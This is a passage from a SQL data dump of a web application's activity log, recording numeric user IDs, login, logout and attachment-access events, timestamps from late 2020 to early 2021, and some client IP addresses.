16:19:33',NULL),(32144,46,'Attachment',1178,'2020-12-01 16:19:33','2020-12-01 16:19:33',NULL),(32145,118,'Login',118,'2020-12-01 18:18:47','2020-12-01 18:18:47',NULL),(32146,118,'Attachment',1178,'2020-12-01 18:19:53','2020-12-01 18:19:53',NULL),(32147,118,'Attachment',1176,'2020-12-01 18:19:53','2020-12-01 18:19:53',NULL),(32148,118,'Attachment',1177,'2020-12-01 18:19:53','2020-12-01 18:19:53',NULL),(32149,118,'Attachment',29,'2020-12-01 18:20:18','2020-12-01 18:20:18',NULL),(32150,2,'Attachment',1176,'2020-12-02 10:58:51','2020-12-02 10:58:51',NULL),(32151,2,'Attachment',1177,'2020-12-02 10:58:51','2020-12-02 10:58:51',NULL),(32152,2,'Attachment',1178,'2020-12-02 10:58:51','2020-12-02 10:58:51',NULL),(32153,2,'Attachment',1177,'2020-12-02 10:58:53','2020-12-02 10:58:53',NULL),(32154,2,'Attachment',1178,'2020-12-02 10:58:53','2020-12-02 10:58:53',NULL),(32155,2,'Attachment',1176,'2020-12-02 10:58:53','2020-12-02 10:58:53',NULL),(32156,2,'Attachment',29,'2020-12-02 10:58:53','2020-12-02 10:58:53',NULL),(32157,2,'Attachment',1177,'2020-12-02 10:58:57','2020-12-02 10:58:57',NULL),(32158,2,'Attachment',1178,'2020-12-02 10:58:57','2020-12-02 10:58:57',NULL),(32159,2,'Attachment',1176,'2020-12-02 10:58:57','2020-12-02 10:58:57',NULL),(32160,2,'Attachment',539,'2020-12-02 11:00:10','2020-12-02 11:00:10',NULL),(32161,2,'Attachment',29,'2020-12-02 13:16:55','2020-12-02 13:16:55',NULL),(32162,2,'Attachment',24,'2020-12-02 13:21:43','2020-12-02 13:21:43',NULL),(32163,49,'Logout',49,'2020-12-02 07:02:20','2020-12-02 07:02:20','121.101.212.150'),(32164,49,'Login',49,'2020-12-02 07:07:04','2020-12-02 07:07:04','121.101.212.150'),(32165,49,'Logout',49,'2020-12-02 15:14:19','2020-12-02 15:14:19',NULL),(32166,49,'Login',49,'2020-12-02 15:17:00','2020-12-02 15:17:00',NULL),(32167,46,'Logout',46,'2020-12-02 15:56:19','2020-12-02 15:56:19',NULL),(32168,63,'Login',63,'2020-12-02 15:56:48','2020-12-02 15:56:48',NULL),(32169,63,'Logout',63,'2020-12-02 16:01:56','2020-12-02 16:01:56',NULL),(32170,46,'Login',46,'2020-12-02 16:02:12','2020-12-02 16:02:12',NULL),(32171,49,'Attachment',1176,'2020-12-02 16:18:13','2020-12-02 16:18:13',NULL),(32172,49,'Attachment',1178,'2020-12-02 16:18:13','2020-12-02 16:18:13',NULL),(32173,46,'Attachment',1292,'2020-12-02 16:34:22','2020-12-02 16:34:22',NULL),(32174,46,'Attachment',1287,'2020-12-02 16:34:22','2020-12-02 16:34:22',NULL),(32175,46,'Attachment',1286,'2020-12-02 16:34:22','2020-12-02 16:34:22',NULL),(32176,46,'Attachment',1089,'2020-12-02 16:34:22','2020-12-02 16:34:22',NULL),(32177,46,'Attachment',1199,'2020-12-02 16:44:27','2020-12-02 16:44:27',NULL),(32178,46,'Attachment',1198,'2020-12-02 16:44:27','2020-12-02 16:44:27',NULL),(32179,46,'Attachment',1193,'2020-12-02 16:44:27','2020-12-02 16:44:27',NULL),(32180,46,'Attachment',1197,'2020-12-02 16:44:27','2020-12-02 16:44:27',NULL),(32181,2,'Attachment',1177,'2020-12-05 10:28:33','2020-12-05 10:28:33',NULL),(32182,2,'Attachment',1178,'2020-12-05 10:28:33','2020-12-05 10:28:33',NULL),(32183,2,'Attachment',1176,'2020-12-05 10:28:33','2020-12-05 10:28:33',NULL),(32184,48,'Login',48,'2020-12-07 12:38:00','2020-12-07 12:38:00',NULL),(32185,48,'Attachment',1177,'2020-12-07 14:02:24','2020-12-07 14:02:24',NULL),(32186,48,'Attachment',1176,'2020-12-07 14:02:24','2020-12-07 14:02:24',NULL),(32187,48,'Attachment',1178,'2020-12-07 14:02:24','2020-12-07 14:02:24',NULL),(32188,2,'Attachment',1176,'2020-12-08 10:14:47','2020-12-08 10:14:47',NULL),(32189,2,'Attachment',1177,'2020-12-08 10:14:47','2020-12-08 10:14:47',NULL),(32190,2,'Attachment',1178,'2020-12-08 10:14:47','2020-12-08 10:14:47',NULL),(32191,48,'Attachment',1176,'2020-12-09 17:36:12','2020-12-09 17:36:12',NULL),(32192,48,'Attachment',1177,'2020-12-09 17:36:12','2020-12-09 17:36:12',NULL),(32193,48,'Attachment',1178,'2020-12-09 17:36:12','2020-12-09 17:36:12',NULL),(32194,48,'Attachment',29,'2020-12-09 17:36:25','2020-12-09 17:36:25',NULL),(32195,48,'Attachment',539,'2020-12-09 17:36:31','2020-12-09 17:36:31',NULL),(32196,48,'Attachment',753,'2020-12-09 17:36:37','2020-12-09 17:36:37',NULL),(32197,48,'Attachment',757,'2020-12-09 17:36:42','2020-12-09 17:36:42',NULL),(32198,48,'Attachment',1099,'2020-12-09 18:33:37','2020-12-09 18:33:37',NULL),(32199,2,'Attachment',36,'2020-12-10 17:51:21','2020-12-10 17:51:21',NULL),(32200,48,'Attachment',1177,'2020-12-11 14:57:46','2020-12-11 14:57:46',NULL),(32201,48,'Attachment',1178,'2020-12-11 14:57:46','2020-12-11 14:57:46',NULL),(32202,2,'Attachment',1176,'2020-12-14 10:54:51','2020-12-14 10:54:51',NULL),(32203,2,'Attachment',1177,'2020-12-14 10:54:51','2020-12-14 10:54:51',NULL),(32204,2,'Attachment',1178,'2020-12-14 10:54:51','2020-12-14 10:54:51',NULL),(32205,2,'Attachment',1178,'2020-12-14 11:56:39','2020-12-14 11:56:39',NULL),(32206,2,'Attachment',1176,'2020-12-14 11:56:39','2020-12-14 11:56:39',NULL),(32207,2,'Attachment',1177,'2020-12-14 11:56:39','2020-12-14 11:56:39',NULL),(32208,2,'Attachment',1178,'2020-12-14 11:59:34','2020-12-14 11:59:34',NULL),(32209,2,'Attachment',1176,'2020-12-14 11:59:34','2020-12-14 11:59:34',NULL),(32210,2,'Attachment',1177,'2020-12-14 11:59:34','2020-12-14 11:59:34',NULL),(32211,2,'Attachment',1178,'2020-12-14 12:12:39','2020-12-14 12:12:39',NULL),(32212,2,'Attachment',1177,'2020-12-14 12:12:39','2020-12-14 12:12:39',NULL),(32213,2,'Attachment',1176,'2020-12-14 12:12:39','2020-12-14 12:12:39',NULL),(32214,2,'Attachment',24,'2020-12-14 12:12:43','2020-12-14 12:12:43',NULL),(32215,2,'Attachment',1177,'2020-12-14 14:19:14','2020-12-14 14:19:14',NULL),(32216,2,'Attachment',1176,'2020-12-14 14:19:14','2020-12-14 14:19:14',NULL),(32217,2,'Attachment',1178,'2020-12-14 14:19:14','2020-12-14 14:19:14',NULL),(32218,2,'Attachment',1176,'2020-12-14 14:32:03','2020-12-14 14:32:03',NULL),(32219,2,'Attachment',1177,'2020-12-14 14:32:03','2020-12-14 14:32:03',NULL),(32220,2,'Attachment',1178,'2020-12-14 14:32:03','2020-12-14 14:32:03',NULL),(32221,120,'Login',120,'2020-12-15 00:49:13','2020-12-15 00:49:13',NULL),(32222,2,'Attachment',1178,'2020-12-15 08:58:35','2020-12-15 08:58:35',NULL),(32223,2,'Attachment',1176,'2020-12-15 08:58:35','2020-12-15 08:58:35',NULL),(32224,2,'Attachment',1177,'2020-12-15 08:58:35','2020-12-15 08:58:35',NULL),(32225,2,'Attachment',29,'2020-12-15 08:58:49','2020-12-15 08:58:49',NULL),(32226,66,'Login',66,'2020-12-15 08:58:58','2020-12-15 08:58:58',NULL),(32227,2,'Attachment',1177,'2020-12-15 09:01:11','2020-12-15 09:01:11',NULL),(32228,2,'Attachment',1178,'2020-12-15 09:01:11','2020-12-15 09:01:11',NULL),(32229,2,'Attachment',1176,'2020-12-15 09:01:11','2020-12-15 09:01:11',NULL),(32230,121,'Login',121,'2020-12-16 16:07:19','2020-12-16 16:07:19',NULL),(32231,121,'Attachment',1176,'2020-12-16 16:10:30','2020-12-16 16:10:30',NULL),(32232,121,'Attachment',1178,'2020-12-16 16:10:30','2020-12-16 16:10:30',NULL),(32233,121,'Attachment',1177,'2020-12-16 16:10:30','2020-12-16 16:10:30',NULL),(32234,121,'Attachment',29,'2020-12-16 17:39:57','2020-12-16 17:39:57',NULL),(32235,121,'Logout',121,'2020-12-16 18:33:44','2020-12-16 18:33:44',NULL),(32236,121,'Login',121,'2020-12-16 18:34:04','2020-12-16 18:34:04',NULL),(32237,122,'Login',122,'2020-12-16 18:56:42','2020-12-16 18:56:42',NULL),(32238,122,'Attachment',1176,'2020-12-16 19:00:51','2020-12-16 19:00:51',NULL),(32239,122,'Attachment',1177,'2020-12-16 19:00:51','2020-12-16 19:00:51',NULL),(32240,122,'Attachment',1178,'2020-12-16 19:00:51','2020-12-16 19:00:51',NULL),(32241,46,'Login',46,'2020-12-16 19:32:47','2020-12-16 19:32:47',NULL),(32242,46,'Logout',46,'2020-12-16 11:45:06','2020-12-16 11:45:06','123.115.65.14'),(32243,121,'Login',121,'2020-12-16 11:45:43','2020-12-16 11:45:43','123.115.65.14'),(32244,121,'Attachment',1177,'2020-12-16 19:47:24','2020-12-16 19:47:24',NULL),(32245,121,'Attachment',1176,'2020-12-16 19:47:24','2020-12-16 19:47:24',NULL),(32246,121,'Attachment',1178,'2020-12-16 19:47:24','2020-12-16 19:47:24',NULL),(32247,46,'Login',46,'2020-12-16 19:48:48','2020-12-16 19:48:48',NULL),(32248,121,'Attachment',938,'2020-12-17 08:29:55','2020-12-17 08:29:55',NULL),(32249,46,'Login',46,'2020-12-17 09:40:20','2020-12-17 09:40:20',NULL),(32250,48,'Logout',48,'2020-12-17 01:58:40','2020-12-17 01:58:40','222.244.105.62'),(32251,121,'Login',121,'2020-12-17 02:13:08','2020-12-17 02:13:08','222.244.105.62'),(32252,46,'Attachment',1178,'2020-12-17 10:25:44','2020-12-17 10:25:44',NULL),(32253,46,'Attachment',1176,'2020-12-17 10:25:44','2020-12-17 10:25:44',NULL),(32254,46,'Attachment',1177,'2020-12-17 10:25:44','2020-12-17 10:25:44',NULL),(32255,122,'Logout',122,'2020-12-17 10:25:52','2020-12-17 10:25:52',NULL),(32256,121,'Login',121,'2020-12-17 10:26:26','2020-12-17 10:26:26',NULL),(32257,46,'Attachment',539,'2020-12-17 10:27:30','2020-12-17 10:27:30',NULL),(32258,46,'Attachment',24,'2020-12-17 10:28:03','2020-12-17 10:28:03',NULL),(32259,121,'Attachment',950,'2020-12-17 11:03:34','2020-12-17 11:03:34',NULL),(32260,121,'Logout',121,'2020-12-17 03:17:12','2020-12-17 03:17:12','222.244.105.62'),(32261,2,'Attachment',1178,'2020-12-21 22:25:45','2020-12-21 22:25:45',NULL),(32262,2,'Attachment',1176,'2020-12-21 22:25:45','2020-12-21 22:25:45',NULL),(32263,2,'Attachment',1177,'2020-12-21 22:25:45','2020-12-21 22:25:45',NULL),(32264,2,'Attachment',539,'2020-12-21 22:27:07','2020-12-21 22:27:07',NULL),(32265,2,'Attachment',1177,'2020-12-22 18:13:36','2020-12-22 18:13:36',NULL),(32266,2,'Attachment',1178,'2020-12-22 18:13:36','2020-12-22 18:13:36',NULL),(32267,2,'Attachment',1176,'2020-12-22 18:13:36','2020-12-22 18:13:36',NULL),(32268,127,'Attachment',1176,'2020-12-22 19:49:42','2020-12-22 19:49:42',NULL),(32269,127,'Attachment',1177,'2020-12-22 19:49:42','2020-12-22 19:49:42',NULL),(32270,127,'Attachment',1178,'2020-12-22 19:49:42','2020-12-22 19:49:42',NULL),(32271,127,'Attachment',29,'2020-12-22 19:49:48','2020-12-22 19:49:48',NULL),(32272,119,'Login',119,'2020-12-24 12:15:11','2020-12-24 12:15:11',NULL),(32273,48,'Login',48,'2020-12-24 06:20:13','2020-12-24 06:20:13','118.250.183.16'),(32274,2,'Attachment',1178,'2020-12-24 15:20:13','2020-12-24 15:20:13',NULL),(32275,2,'Attachment',1176,'2020-12-24 15:20:13','2020-12-24 15:20:13',NULL),(32276,2,'Attachment',1177,'2020-12-24 15:20:13','2020-12-24 15:20:13',NULL),(32277,2,'Attachment',29,'2020-12-24 15:20:19','2020-12-24 15:20:19',NULL),(32278,128,'Login',128,'2020-12-24 07:26:03','2020-12-24 07:26:03','118.250.183.16'),(32279,2,'Attachment',1176,'2020-12-24 17:36:56','2020-12-24 17:36:56',NULL),(32280,2,'Attachment',1177,'2020-12-24 17:36:56','2020-12-24 17:36:56',NULL),(32281,2,'Attachment',1178,'2020-12-24 17:36:56','2020-12-24 17:36:56',NULL),(32282,2,'Attachment',1177,'2020-12-25 12:54:55','2020-12-25 12:54:55',NULL),(32283,2,'Attachment',1176,'2020-12-25 12:54:55','2020-12-25 12:54:55',NULL),(32284,2,'Attachment',1178,'2020-12-25 12:54:55','2020-12-25 12:54:55',NULL),(32285,2,'Attachment',1176,'2020-12-25 12:56:04','2020-12-25 12:56:04',NULL),(32286,2,'Attachment',1177,'2020-12-25 12:56:04','2020-12-25 12:56:04',NULL),(32287,2,'Attachment',1178,'2020-12-25 12:56:05','2020-12-25 12:56:05',NULL),(32288,2,'Attachment',1177,'2020-12-25 13:03:13','2020-12-25 13:03:13',NULL),(32289,2,'Attachment',1176,'2020-12-25 13:03:13','2020-12-25 13:03:13',NULL),(32290,2,'Attachment',1178,'2020-12-25 13:03:13','2020-12-25 13:03:13',NULL),(32291,129,'Login',129,'2020-12-27 03:48:51','2020-12-27 03:48:51','120.244.62.171'),(32292,2,'Attachment',1176,'2020-12-28 11:33:33','2020-12-28 11:33:33',NULL),(32293,2,'Attachment',1178,'2020-12-28 11:33:33','2020-12-28 11:33:33',NULL),(32294,2,'Attachment',1177,'2020-12-28 11:33:33','2020-12-28 11:33:33',NULL),(32295,128,'Logout',128,'2020-12-29 10:23:02','2020-12-29 10:23:02',NULL),(32296,2,'Attachment',1178,'2020-12-29 10:47:51','2020-12-29 10:47:51',NULL),(32297,2,'Attachment',1176,'2020-12-29 10:47:51','2020-12-29 10:47:51',NULL),(32298,2,'Attachment',1177,'2020-12-29 10:47:51','2020-12-29 10:47:51',NULL),(32299,1,'Login',1,'2020-12-29 02:49:05','2020-12-29 02:49:05','121.101.212.150'),(32300,1,'Attachment',1178,'2020-12-29 11:01:51','2020-12-29 11:01:51',NULL),(32301,1,'Attachment',1176,'2020-12-29 11:01:51','2020-12-29 11:01:51',NULL),(32302,1,'Attachment',1177,'2020-12-29 11:01:51','2020-12-29 11:01:51',NULL),(32303,2,'Attachment',1176,'2020-12-29 11:06:42','2020-12-29 11:06:42',NULL),(32304,2,'Attachment',1177,'2020-12-29 11:06:42','2020-12-29 11:06:42',NULL),(32305,2,'Attachment',1178,'2020-12-29 11:06:42','2020-12-29 11:06:42',NULL),(32306,2,'Attachment',757,'2020-12-29 11:06:54','2020-12-29 11:06:54',NULL),(32307,128,'Login',128,'2020-12-29 11:46:00','2020-12-29 11:46:00',NULL),(32308,128,'Login',128,'2020-12-29 11:48:57','2020-12-29 11:48:57',NULL),(32309,131,'Attachment',938,'2020-12-29 11:48:59','2020-12-29 11:48:59',NULL),(32310,131,'Attachment',29,'2020-12-29 11:50:19','2020-12-29 11:50:19',NULL),(32311,128,'Logout',128,'2020-12-29 03:51:44','2020-12-29 03:51:44','101.126.148.228'),(32312,128,'Login',128,'2020-12-29 03:51:51','2020-12-29 03:51:51','101.126.148.228'),(32313,49,'Login',49,'2020-12-29 06:35:39','2020-12-29 06:35:39','121.101.212.150'),(32314,55,'Login',55,'2020-12-29 15:04:15','2020-12-29 15:04:15',NULL),(32315,128,'Logout',128,'2020-12-29 07:11:35','2020-12-29 07:11:35','101.126.148.228'),(32316,48,'Logout',48,'2020-12-29 07:13:18','2020-12-29 07:13:18','222.247.192.20'),(32317,132,'Login',132,'2020-12-29 07:13:55','2020-12-29 07:13:55','101.126.148.228'),(32318,49,'Logout',49,'2020-12-29 07:14:03','2020-12-29 07:14:03','121.101.212.150'),(32319,49,'Login',49,'2020-12-29 07:14:26','2020-12-29 07:14:26','121.101.212.150'),(32320,46,'Logout',46,'2020-12-29 07:16:23','2020-12-29 07:16:23','121.101.212.150'),(32321,66,'Login',66,'2020-12-29 15:23:11','2020-12-29 15:23:11',NULL),(32322,134,'Login',134,'2020-12-29 15:25:28','2020-12-29 15:25:28',NULL),(32323,46,'Login',46,'2020-12-29 07:30:40','2020-12-29 07:30:40','121.101.212.150'),(32324,73,'Login',73,'2020-12-29 07:31:04','2020-12-29 07:31:04','121.101.212.150'),(32325,132,'Logout',132,'2020-12-29 07:47:12','2020-12-29 07:47:12','101.126.148.228'),(32326,132,'Login',132,'2020-12-29 07:47:22','2020-12-29 07:47:22','101.126.148.228'),(32327,133,'Login',133,'2020-12-29 08:09:34','2020-12-29 08:09:34','222.247.192.20'),(32328,132,'Logout',132,'2020-12-29 08:33:57','2020-12-29 08:33:57','101.126.148.228'),(32329,128,'Login',128,'2020-12-29 08:34:10','2020-12-29 08:34:10','101.126.148.228'),(32330,128,'Logout',128,'2020-12-29 08:39:57','2020-12-29 08:39:57','101.126.148.228'),(32331,132,'Login',132,'2020-12-29 08:40:11','2020-12-29 08:40:11','101.126.148.228'),(32332,132,'Logout',132,'2020-12-29 09:06:57','2020-12-29 09:06:57','101.126.148.228'),(32333,133,'Logout',133,'2020-12-29 09:18:18','2020-12-29 09:18:18','222.247.192.20'),(32334,132,'Login',132,'2020-12-29 09:35:02','2020-12-29 09:35:02','101.126.148.228'),(32335,132,'Logout',132,'2020-12-29 09:35:15','2020-12-29 09:35:15','101.126.148.228'),(32336,132,'Login',132,'2020-12-29 09:38:51','2020-12-29 09:38:51','101.126.148.228'),(32337,132,'Logout',132,'2020-12-29 09:39:07','2020-12-29 09:39:07','101.126.148.228'),(32338,128,'Login',128,'2020-12-29 09:39:14','2020-12-29 09:39:14','101.126.148.228'),(32339,128,'Logout',128,'2020-12-29 09:48:29','2020-12-29 09:48:29','101.126.148.228'),(32340,132,'Login',132,'2020-12-29 09:48:40','2020-12-29 09:48:40','101.126.148.228'),(32341,132,'Logout',132,'2020-12-29 10:08:40','2020-12-29 10:08:40','101.126.148.228'),(32342,128,'Login',128,'2020-12-29 10:08:49','2020-12-29 10:08:49','101.126.148.228'),(32343,1,'Attachment',1176,'2020-12-30 10:01:26','2020-12-30 10:01:26',NULL),(32344,1,'Attachment',1178,'2020-12-30 10:01:26','2020-12-30 10:01:26',NULL),(32345,1,'Attachment',1177,'2020-12-30 10:01:26','2020-12-30 10:01:26',NULL),(32346,135,'Login',135,'2020-12-30 02:07:37','2020-12-30 02:07:37','119.39.19.244'),(32347,46,'Logout',46,'2020-12-31 11:51:03','2020-12-31 11:51:03',NULL),(32348,66,'Logout',66,'2020-12-31 03:51:07','2020-12-31 03:51:07','121.101.212.150'),(32349,46,'Login',46,'2020-12-31 03:51:12','2020-12-31 03:51:12','121.101.212.150'),(32350,66,'Login',66,'2020-12-31 11:51:37','2020-12-31 11:51:37',NULL),(32351,2,'Attachment',1273,'2020-12-31 13:23:39','2020-12-31 13:23:39',NULL),(32352,132,'Login',132,'2020-12-31 05:39:48','2020-12-31 05:39:48','101.126.155.8'),(32353,133,'Login',133,'2020-12-31 14:29:02','2020-12-31 14:29:02',NULL),(32354,133,'Login',133,'2020-12-31 14:29:02','2020-12-31 14:29:02',NULL),(32355,132,'Logout',132,'2020-12-31 15:02:40','2020-12-31 15:02:40',NULL),(32356,132,'Login',132,'2020-12-31 15:03:00','2020-12-31 15:03:00',NULL),(32357,132,'Logout',132,'2020-12-31 07:04:42','2020-12-31 07:04:42','101.126.155.8'),(32358,132,'Login',132,'2020-12-31 07:04:56','2020-12-31 07:04:56','101.126.155.8'),(32359,132,'Logout',132,'2020-12-31 07:05:20','2020-12-31 07:05:20','101.126.155.8'),(32360,128,'Login',128,'2020-12-31 07:05:30','2020-12-31 07:05:30','101.126.155.8'),(32361,2,'Attachment',416,'2021-01-01 20:07:16','2021-01-01 20:07:16',NULL),(32362,2,'Attachment',541,'2021-01-01 20:07:16','2021-01-01 20:07:16',NULL),(32363,2,'Attachment',546,'2021-01-01 20:07:16','2021-01-01 20:07:16',NULL),(32364,2,'Attachment',753,'2021-01-01 20:07:16','2021-01-01 20:07:16',NULL),(32365,133,'Login',133,'2021-01-04 02:12:07','2021-01-04 02:12:07','175.9.121.129'),(32366,134,'Login',134,'2021-01-04 02:23:57','2021-01-04 02:23:57','175.9.121.129'),(32367,134,'Login',134,'2021-01-04 02:26:11','2021-01-04 02:26:11','175.9.121.129'),(32368,133,'Logout',133,'2021-01-04 07:32:27','2021-01-04 07:32:27','175.9.121.129'),(32369,133,'Login',133,'2021-01-04 07:32:46','2021-01-04 07:32:46','175.9.121.129'),(32370,128,'Logout',128,'2021-01-04 08:24:21','2021-01-04 08:24:21','175.9.121.129'),(32371,134,'Login',134,'2021-01-04 08:24:28','2021-01-04 08:24:28','175.9.121.129'),(32372,134,'Logout',134,'2021-01-04 08:56:45','2021-01-04 08:56:45','175.9.121.129'),(32373,128,'Login',128,'2021-01-04 08:56:50','2021-01-04 08:56:50','175.9.121.129'),(32374,133,'Logout',133,'2021-01-04 09:07:04','2021-01-04 09:07:04','175.9.121.129'),(32375,134,'Login',134,'2021-01-04 09:07:13','2021-01-04 09:07:13','175.9.121.129'),(32376,134,'Logout',134,'2021-01-04 09:07:34','2021-01-04 09:07:34','175.9.121.129'),(32377,134,'Login',134,'2021-01-04 09:08:02','2021-01-04 09:08:02','175.9.121.129'),(32378,128,'Logout',128,'2021-01-04 09:38:42','2021-01-04 09:38:42','175.9.121.129'),(32379,134,'Login',134,'2021-01-04 09:38:55','2021-01-04 09:38:55','175.9.121.129'),(32380,134,'Logout',134,'2021-01-04 09:39:28','2021-01-04 09:39:28','175.9.121.129'),(32381,128,'Login',128,'2021-01-04 09:39:31','2021-01-04 09:39:31','175.9.121.129'),(32382,128,'Logout',128,'2021-01-04 09:40:11','2021-01-04 09:40:11','175.9.121.129'),(32383,128,'Login',128,'2021-01-04 09:40:22','2021-01-04 09:40:22','175.9.121.129'),(32384,134,'Login',134,'2021-01-04 09:59:31','2021-01-04 09:59:31','175.9.121.129'),(32385,2,'Attachment',24,'2021-01-05 07:51:28','2021-01-05 07:51:28',NULL),(32386,2,'Attachment',24,'2021-01-05 07:51:37','2021-01-05 07:51:37',NULL),(32387,49,'Login',49,'2021-01-05 07:52:48','2021-01-05 07:52:48',NULL),(32388,115,'Login',115,'2021-01-05 00:12:24','2021-01-05 00:12:24','121.101.212.150'),(32389,2,'Attachment',1178,'2021-01-05 08:14:57','2021-01-05 08:14:57',NULL),(32390,2,'Attachment',1176,'2021-01-05 08:14:57','2021-01-05 08:14:57',NULL),(32391,2,'Attachment',1177,'2021-01-05 08:14:57','2021-01-05 08:14:57',NULL),(32392,122,'Login',122,'2021-01-05 08:36:58','2021-01-05 08:36:58',NULL),(32393,64,'Login',64,'2021-01-05 00:37:11','2021-01-05 00:37:11','121.101.212.150'),(32394,122,'Logout',122,'2021-01-05 00:39:46','2021-01-05 00:39:46','223.104.218.249'),(32395,55,'Attachment',1177,'2021-01-05 08:56:25','2021-01-05 08:56:25',NULL),(32396,55,'Attachment',1176,'2021-01-05 08:56:25','2021-01-05 08:56:25',NULL),(32397,55,'Attachment',1178,'2021-01-05 08:56:25','2021-01-05 08:56:25',NULL),(32398,136,'Login',136,'2021-01-05 02:34:06','2021-01-05 02:34:06','223.104.219.171'),(32399,2,'Attachment',1176,'2021-01-05 12:18:20','2021-01-05 12:18:20',NULL),(32400,2,'Attachment',1177,'2021-01-05 12:18:20','2021-01-05 12:18:20',NULL),(32401,2,'Attachment',1178,'2021-01-05 12:18:20','2021-01-05 12:18:20',NULL),(32402,121,'Login',121,'2021-01-05 06:43:16','2021-01-05 06:43:16','223.104.218.73'),(32403,121,'Attachment',1177,'2021-01-05 16:29:09','2021-01-05 16:29:09',NULL),(32404,121,'Attachment',1176,'2021-01-05 16:29:09','2021-01-05 16:29:09',NULL),(32405,121,'Attachment',1178,'2021-01-05 16:29:09','2021-01-05 16:29:09',NULL),(32406,121,'Logout',121,'2021-01-05 10:40:36','2021-01-05 10:40:36','223.104.218.121'),(32407,137,'Login',137,'2021-01-05 10:44:10','2021-01-05 10:44:10','223.104.218.121'),(32408,137,'Login',137,'2021-01-05 18:56:17','2021-01-05 18:56:17',NULL),(32409,121,'Login',121,'2021-01-05 19:02:20','2021-01-05 19:02:20',NULL),(32410,121,'Attachment',1176,'2021-01-05 19:05:15','2021-01-05 19:05:15',NULL),(32411,121,'Attachment',1177,'2021-01-05 19:05:15','2021-01-05 19:05:15',NULL),(32412,121,'Attachment',1178,'2021-01-05 19:05:15','2021-01-05 19:05:15',NULL),(32413,137,'Logout',137,'2021-01-05 11:08:34','2021-01-05 11:08:34','223.104.218.121'),(32414,121,'Login',121,'2021-01-05 11:08:41','2021-01-05 11:08:41','223.104.218.121'),(32415,121,'Logout',121,'2021-01-05 11:12:00','2021-01-05 11:12:00','223.104.218.121'),(32416,137,'Login',137,'2021-01-05 11:12:43','2021-01-05 11:12:43','223.104.218.121'),(32417,121,'Login',121,'2021-01-05 11:14:23','2021-01-05 11:14:23','223.104.218.121'),(32418,137,'Login',137,'2021-01-05 19:43:03','2021-01-05 19:43:03',NULL),(32419,137,'Attachment',1176,'2021-01-05 20:02:14','2021-01-05 20:02:14',NULL),(32420,137,'Attachment',1177,'2021-01-05 20:02:14','2021-01-05 20:02:14',NULL),(32421,137,'Attachment',1178,'2021-01-05 20:02:14','2021-01-05 20:02:14',NULL),(32422,66,'Logout',66,'2021-01-06 00:09:47','2021-01-06 00:09:47','121.101.212.150'),(32423,115,'Login',115,'2021-01-06 00:14:13','2021-01-06 00:14:13','121.101.212.150'),(32424,128,'Logout',128,'2021-01-06 02:22:02','2021-01-06 02:22:02','175.9.121.129'),(32425,128,'Login',128,'2021-01-06 10:22:41','2021-01-06 10:22:41',NULL),(32426,128,'Logout',128,'2021-01-06 02:24:20','2021-01-06 02:24:20','175.9.121.129'),(32427,2,'Attachment',1177,'2021-01-06 10:29:43','2021-01-06 10:29:43',NULL),(32428,2,'Attachment',1176,'2021-01-06 10:29:43','2021-01-06 10:29:43',NULL),(32429,2,'Attachment',1178,'2021-01-06 10:29:43','2021-01-06 10:29:43',NULL),(32430,128,'Login',128,'2021-01-06 10:30:08','2021-01-06 10:30:08',NULL),(32431,2,'Attachment',1177,'2021-01-06 10:36:55','2021-01-06 10:36:55',NULL),(32432,2,'Attachment',1176,'2021-01-06 10:36:55','2021-01-06 10:36:55',NULL),(32433,2,'Attachment',1178,'2021-01-06 10:36:55','2021-01-06 10:36:55',NULL),(32434,128,'Logout',128,'2021-01-06 10:46:22','2021-01-06 10:46:22',NULL),(32435,138,'Logout',138,'2021-01-06 11:04:23','2021-01-06 11:04:23',NULL),(32436,128,'Login',128,'2021-01-06 03:15:08','2021-01-06 03:15:08','175.9.121.129'),(32437,140,'Logout',140,'2021-01-06 11:21:01','2021-01-06 11:21:01',NULL),(32438,142,'Logout',142,'2021-01-06 11:39:15','2021-01-06 11:39:15',NULL),(32439,143,'Logout',143,'2021-01-06 11:45:44','2021-01-06 11:45:44',NULL),(32440,143,'Logout',143,'2021-01-06 11:45:45','2021-01-06 11:45:45',NULL),(32441,55,'Attachment',1176,'2021-01-06 13:14:22','2021-01-06 13:14:22',NULL),(32442,55,'Attachment',1178,'2021-01-06 13:14:22','2021-01-06 13:14:22',NULL),(32443,55,'Attachment',1177,'2021-01-06 13:14:22','2021-01-06 13:14:22',NULL),(32444,144,'Logout',144,'2021-01-06 14:01:54','2021-01-06 14:01:54',NULL),(32445,145,'Logout',145,'2021-01-06 14:44:04','2021-01-06 14:44:04',NULL),(32446,128,'Logout',128,'2021-01-06 14:50:04','2021-01-06 14:50:04',NULL),(32447,147,'Logout',147,'2021-01-06 14:55:17','2021-01-06 14:55:17',NULL),(32448,148,'Logout',148,'2021-01-06 14:56:42','2021-01-06 14:56:42',NULL),(32449,1,'Logout',1,'2021-01-06 15:43:16','2021-01-06 15:43:16',NULL),(32450,149,'Login',149,'2021-01-06 07:44:46','2021-01-06 07:44:46','121.101.212.150'),(32451,64,'Logout',64,'2021-01-06 07:45:15','2021-01-06 07:45:15','121.101.212.150'),(32452,1,'Login',1,'2021-01-06 07:45:25','2021-01-06 07:45:25','121.101.212.150'),(32453,2,'Logout',2,'2021-01-06 07:47:54','2021-01-06 07:47:54','175.9.121.129'),(32454,48,'Login',48,'2021-01-06 15:48:19','2021-01-06 15:48:19',NULL),(32455,149,'Attachment',1099,'2021-01-06 15:48:36','2021-01-06 15:48:36',NULL),(32456,149,'Attachment',755,'2021-01-06 15:48:45','2021-01-06 15:48:45',NULL),(32457,149,'Attachment',539,'2021-01-06 15:48:53','2021-01-06 15:48:53',NULL),(32458,150,'Logout',150,'2021-01-06 15:49:43','2021-01-06 15:49:43',NULL),(32459,150,'Login',150,'2021-01-06 15:49:51','2021-01-06 15:49:51',NULL),(32460,150,'Logout',150,'2021-01-06 07:50:55','2021-01-06 07:50:55','175.9.121.129'),(32461,128,'Login',128,'2021-01-06 07:50:59','2021-01-06 07:50:59','175.9.121.129'),(32462,128,'Logout',128,'2021-01-06 07:51:21','2021-01-06 07:51:21','175.9.121.129'),(32463,150,'Login',150,'2021-01-06 07:51:35','2021-01-06 07:51:35','175.9.121.129'),(32464,150,'Logout',150,'2021-01-06 07:52:09','2021-01-06 07:52:09','175.9.121.129'),(32465,128,'Login',128,'2021-01-06 07:52:15','2021-01-06 07:52:15','175.9.121.129'),(32466,73,'Attachment',1177,'2021-01-06 15:53:28','2021-01-06 15:53:28',NULL),(32467,73,'Attachment',1178,'2021-01-06 15:53:28','2021-01-06 15:53:28',NULL),(32468,73,'Attachment',1176,'2021-01-06 